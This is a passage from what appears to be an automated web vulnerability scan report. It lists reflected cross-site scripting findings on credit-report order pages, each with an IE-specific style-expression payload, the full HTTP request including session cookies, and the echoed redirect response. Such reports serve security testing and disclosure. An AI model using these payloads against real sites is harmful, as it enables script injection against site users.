Location: https://www.creditreport.com/dni/Order1.aspx?areaid=22&pkgid=C2TDM97167'style='x:expression(alert(1))'99b0eaeaf16&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C94085.A70594.RA0.G11457.UFB8AC43E].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditreport.com/dni/Order1.aspx?areaid=22&amp;pkgid=C2TDM97167'style='x:expression(alert(1))'99b0eaeaf16&amp;SiteVersionID=967&amp;SiteID=100332&amp;sc=671917&amp;bcd=comptst'>
...[SNIP]...

6.453. http://www.creditreport.com/dni/Order1.aspx [sc parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditreport.com
Path:   /dni/Order1.aspx

Issue detail

The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 37016'style%3d'x%3aexpression(alert(1))'fed4e089729 was submitted in the sc parameter. This input was echoed as 37016'style='x:expression(alert(1))'fed4e089729 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=67191737016'style%3d'x%3aexpression(alert(1))'fed4e089729&bcd=comptst HTTP/1.1
Host: www.creditreport.com
Proxy-Connection: keep-alive
Referer: http://www.creditreport.com/dni/default.aspx?PageTypeID=HomePage3&SiteVersionID=967&sc=671917&bcd=comptst&s_kwcid=TC|14081|instant%20credit%20report%20free||S|b|7587846271&gclid=CLv8q_e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 25 Apr 2011 01:29:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditreport.com/dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=67191737016'style='x:expression(alert(1))'fed4e089729&bcd=comptst
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C94085.A70594.RA0.G11457.U263D4CC8].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditreport.com/dni/Order1.aspx?areaid=22&amp;pkgid=C2TDM&amp;SiteVersionID=967&amp;SiteID=100332&amp;sc=67191737016'style='x:expression(alert(1))'fed4e089729&amp;bcd=comptst'>
...[SNIP]...

6.454. http://www.experiandirect.com/triplealert/Order1.aspx [SiteID parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.experiandirect.com
Path:   /triplealert/Order1.aspx

Issue detail

The value of the SiteID request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ead02'style%3d'x%3aexpression(alert(1))'438ff512de3 was submitted in the SiteID parameter. This input was echoed as ead02'style='x:expression(alert(1))'438ff512de3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173ead02'style%3d'x%3aexpression(alert(1))'438ff512de3&sc=668715&bcd= HTTP/1.1
Host: www.experiandirect.com
Proxy-Connection: keep-alive
Referer: http://www.experiandirect.com/triplealert/default.aspx?sc=668715
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000; ASP.NET_SessionId=coygyj55nspn2hy5hekqo5bx; s_pers=%20s_lv%3D1303674402594%7C1398282402594%3B%20s_lv_s%3DFirst%2520Visit%7C1303676202594%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303674402602'%255D%255D%7C1461527202602%3B%20sc_cidstack%3D%255B%255B'668715'%252C'1303674402604'%255D%255D%7C1461527202604%3B%20sc_dl%3D1%7C1303676372831%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.experiandirect.com%252Ftriplealert%252Fdefault.aspx%253Fsc%253D668715%7C1303676372835%3B%20gpv_PN%3D100173%253Atriplealert%253Adefault.aspx%7C1303676372837%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_gvl_sc%3D668715%3B%20sc_gvl_bcd%3D0%3B%20c_m%3Dundefined668715undefined%3B%20ttc%3D1303674572839%3B%20SC_LINKS%3D100173%253Atriplealert%253Adefault.aspx%255E%255E%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E100173%253Atriplealert%253Adefault.aspx%2520%257C%2520%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpitriplealertlive%253D%252526pid%25253D100173%2525253Atriplealert%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.experiandirect.com%2525252Ftriplealert%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DBCZ1Y%25252526SiteVersionID%2525253D473%25252526Sit_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 20:24:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173ead02'style='x:expression(alert(1))'438ff512de3&sc=668715&bcd=
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 307

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&amp;pkgid=BCZ1Y&amp;SiteVersionID=473&amp;SiteID=100173ead02'style='x:expression(alert(1))'438ff512de3&amp;sc=668715&amp;bcd='>
...[SNIP]...

6.455. http://www.experiandirect.com/triplealert/Order1.aspx [SiteVersionID parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.experiandirect.com
Path:   /triplealert/Order1.aspx

Issue detail

The value of the SiteVersionID request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5110c'style%3d'x%3aexpression(alert(1))'2f364d842 was submitted in the SiteVersionID parameter. This input was echoed as 5110c'style='x:expression(alert(1))'2f364d842 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=4735110c'style%3d'x%3aexpression(alert(1))'2f364d842&SiteID=100173&sc=668715&bcd= HTTP/1.1
Host: www.experiandirect.com
Proxy-Connection: keep-alive
Referer: http://www.experiandirect.com/triplealert/default.aspx?sc=668715
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000; ASP.NET_SessionId=coygyj55nspn2hy5hekqo5bx; s_pers=%20s_lv%3D1303674402594%7C1398282402594%3B%20s_lv_s%3DFirst%2520Visit%7C1303676202594%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303674402602'%255D%255D%7C1461527202602%3B%20sc_cidstack%3D%255B%255B'668715'%252C'1303674402604'%255D%255D%7C1461527202604%3B%20sc_dl%3D1%7C1303676372831%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.experiandirect.com%252Ftriplealert%252Fdefault.aspx%253Fsc%253D668715%7C1303676372835%3B%20gpv_PN%3D100173%253Atriplealert%253Adefault.aspx%7C1303676372837%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_gvl_sc%3D668715%3B%20sc_gvl_bcd%3D0%3B%20c_m%3Dundefined668715undefined%3B%20ttc%3D1303674572839%3B%20SC_LINKS%3D100173%253Atriplealert%253Adefault.aspx%255E%255E%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E100173%253Atriplealert%253Adefault.aspx%2520%257C%2520%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpitriplealertlive%253D%252526pid%25253D100173%2525253Atriplealert%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.experiandirect.com%2525252Ftriplealert%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DBCZ1Y%25252526SiteVersionID%2525253D473%25252526Sit_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 20:22:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=4735110c'style='x:expression(alert(1))'2f364d842&SiteID=100173&sc=668715&bcd=
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 305

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&amp;pkgid=BCZ1Y&amp;SiteVersionID=4735110c'style='x:expression(alert(1))'2f364d842&amp;SiteID=100173&amp;sc=668715&amp;bcd='>
...[SNIP]...

6.456. http://www.experiandirect.com/triplealert/Order1.aspx [areaid parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.experiandirect.com
Path:   /triplealert/Order1.aspx

Issue detail

The value of the areaid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 27b31'style%3d'x%3aexpression(alert(1))'6fedcd62c5c was submitted in the areaid parameter. This input was echoed as 27b31'style='x:expression(alert(1))'6fedcd62c5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /triplealert/Order1.aspx?areaid=2227b31'style%3d'x%3aexpression(alert(1))'6fedcd62c5c&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173&sc=668715&bcd= HTTP/1.1
Host: www.experiandirect.com
Proxy-Connection: keep-alive
Referer: http://www.experiandirect.com/triplealert/default.aspx?sc=668715
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000; ASP.NET_SessionId=coygyj55nspn2hy5hekqo5bx; s_pers=%20s_lv%3D1303674402594%7C1398282402594%3B%20s_lv_s%3DFirst%2520Visit%7C1303676202594%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303674402602'%255D%255D%7C1461527202602%3B%20sc_cidstack%3D%255B%255B'668715'%252C'1303674402604'%255D%255D%7C1461527202604%3B%20sc_dl%3D1%7C1303676372831%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.experiandirect.com%252Ftriplealert%252Fdefault.aspx%253Fsc%253D668715%7C1303676372835%3B%20gpv_PN%3D100173%253Atriplealert%253Adefault.aspx%7C1303676372837%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_gvl_sc%3D668715%3B%20sc_gvl_bcd%3D0%3B%20c_m%3Dundefined668715undefined%3B%20ttc%3D1303674572839%3B%20SC_LINKS%3D100173%253Atriplealert%253Adefault.aspx%255E%255E%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E100173%253Atriplealert%253Adefault.aspx%2520%257C%2520%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpitriplealertlive%253D%252526pid%25253D100173%2525253Atriplealert%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.experiandirect.com%2525252Ftriplealert%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DBCZ1Y%25252526SiteVersionID%2525253D473%25252526Sit_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 20:17:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.experiandirect.com/triplealert/Order1.aspx?areaid=2227b31'style='x:expression(alert(1))'6fedcd62c5c&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173&sc=668715&bcd=
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 307

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.experiandirect.com/triplealert/Order1.aspx?areaid=2227b31'style='x:expression(alert(1))'6fedcd62c5c&amp;pkgid=BCZ1Y&amp;SiteVersionID=473&amp;SiteID=100173&amp;sc=668715&amp;bcd='>
...[SNIP]...

6.457. http://www.experiandirect.com/triplealert/Order1.aspx [bcd parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.experiandirect.com
Path:   /triplealert/Order1.aspx

Issue detail

The value of the bcd request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9db94'style%3d'x%3aexpression(alert(1))'48fa9480356 was submitted in the bcd parameter. This input was echoed as 9db94'style='x:expression(alert(1))'48fa9480356 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173&sc=668715&bcd=9db94'style%3d'x%3aexpression(alert(1))'48fa9480356 HTTP/1.1
Host: www.experiandirect.com
Proxy-Connection: keep-alive
Referer: http://www.experiandirect.com/triplealert/default.aspx?sc=668715
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000; ASP.NET_SessionId=coygyj55nspn2hy5hekqo5bx; s_pers=%20s_lv%3D1303674402594%7C1398282402594%3B%20s_lv_s%3DFirst%2520Visit%7C1303676202594%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303674402602'%255D%255D%7C1461527202602%3B%20sc_cidstack%3D%255B%255B'668715'%252C'1303674402604'%255D%255D%7C1461527202604%3B%20sc_dl%3D1%7C1303676372831%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.experiandirect.com%252Ftriplealert%252Fdefault.aspx%253Fsc%253D668715%7C1303676372835%3B%20gpv_PN%3D100173%253Atriplealert%253Adefault.aspx%7C1303676372837%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_gvl_sc%3D668715%3B%20sc_gvl_bcd%3D0%3B%20c_m%3Dundefined668715undefined%3B%20ttc%3D1303674572839%3B%20SC_LINKS%3D100173%253Atriplealert%253Adefault.aspx%255E%255E%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E100173%253Atriplealert%253Adefault.aspx%2520%257C%2520%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpitriplealertlive%253D%252526pid%25253D100173%2525253Atriplealert%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.experiandirect.com%2525252Ftriplealert%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DBCZ1Y%25252526SiteVersionID%2525253D473%25252526Sit_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 20:29:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173&sc=668715&bcd=9db94'style='x:expression(alert(1))'48fa9480356
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 307

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&amp;pkgid=BCZ1Y&amp;SiteVersionID=473&amp;SiteID=100173&amp;sc=668715&amp;bcd=9db94'style='x:expression(alert(1))'48fa9480356'>
...[SNIP]...

6.458. http://www.experiandirect.com/triplealert/Order1.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.experiandirect.com
Path:   /triplealert/Order1.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ed5ab'style%3d'x%3aexpression(alert(1))'c5c816e783 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed5ab'style='x:expression(alert(1))'c5c816e783 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173&sc=668715&bcd=&ed5ab'style%3d'x%3aexpression(alert(1))'c5c816e783=1 HTTP/1.1
Host: www.experiandirect.com
Proxy-Connection: keep-alive
Referer: http://www.experiandirect.com/triplealert/default.aspx?sc=668715
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000; ASP.NET_SessionId=coygyj55nspn2hy5hekqo5bx; s_pers=%20s_lv%3D1303674402594%7C1398282402594%3B%20s_lv_s%3DFirst%2520Visit%7C1303676202594%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303674402602'%255D%255D%7C1461527202602%3B%20sc_cidstack%3D%255B%255B'668715'%252C'1303674402604'%255D%255D%7C1461527202604%3B%20sc_dl%3D1%7C1303676372831%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.experiandirect.com%252Ftriplealert%252Fdefault.aspx%253Fsc%253D668715%7C1303676372835%3B%20gpv_PN%3D100173%253Atriplealert%253Adefault.aspx%7C1303676372837%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_gvl_sc%3D668715%3B%20sc_gvl_bcd%3D0%3B%20c_m%3Dundefined668715undefined%3B%20ttc%3D1303674572839%3B%20SC_LINKS%3D100173%253Atriplealert%253Adefault.aspx%255E%255E%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E100173%253Atriplealert%253Adefault.aspx%2520%257C%2520%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpitriplealertlive%253D%252526pid%25253D100173%2525253Atriplealert%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.experiandirect.com%2525252Ftriplealert%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DBCZ1Y%25252526SiteVersionID%2525253D473%25252526Sit_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 20:33:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173&sc=668715&bcd=&ed5ab'style='x:expression(alert(1))'c5c816e783=1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 313

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&amp;pkgid=BCZ1Y&amp;SiteVersionID=473&amp;SiteID=100173&amp;sc=668715&amp;bcd=&amp;ed5ab'style='x:expression(alert(1))'c5c816e783=1'>
...[SNIP]...

6.459. http://www.experiandirect.com/triplealert/Order1.aspx [pkgid parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.experiandirect.com
Path:   /triplealert/Order1.aspx

Issue detail

The value of the pkgid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 262ad'style%3d'x%3aexpression(alert(1))'b0fcf4c466a was submitted in the pkgid parameter. This input was echoed as 262ad'style='x:expression(alert(1))'b0fcf4c466a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y262ad'style%3d'x%3aexpression(alert(1))'b0fcf4c466a&SiteVersionID=473&SiteID=100173&sc=668715&bcd= HTTP/1.1
Host: www.experiandirect.com
Proxy-Connection: keep-alive
Referer: http://www.experiandirect.com/triplealert/default.aspx?sc=668715
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
